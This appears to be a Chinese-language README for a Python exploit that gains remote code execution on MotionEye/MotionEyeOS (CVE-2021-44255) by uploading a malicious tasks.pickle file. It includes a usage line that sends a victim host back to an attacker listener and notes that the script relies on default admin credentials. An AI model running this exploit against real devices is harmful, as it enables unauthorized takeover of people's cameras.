这是一个 Python 3 脚本,用于上传 tasks.pickle 文件,从而在 MotionEye 中实现 RCE。你需要管理员凭据,所以这应该不是什么大问题。不幸的是,MotionEye/MotionEyeOS 经常被发现使用默认凭据运行。
示例:
main.py --victim 192.168.1.2 --attacker 192.168.1.3:4444
其中 victim 和 attacker 的格式为 ip:port,除非端口是 80,此时可以省略端口。此脚本使用默认用户名 admin 和空密码。还有用于指定其他用户名/密码的 CLI 选项。更多细节请参见代码。
CVE-2021-44255
请参阅 https://www.pizzapower.me/2021/10/09/self-hosted-security-part-1-motioneye 了解此问题及其他问题的详细说明。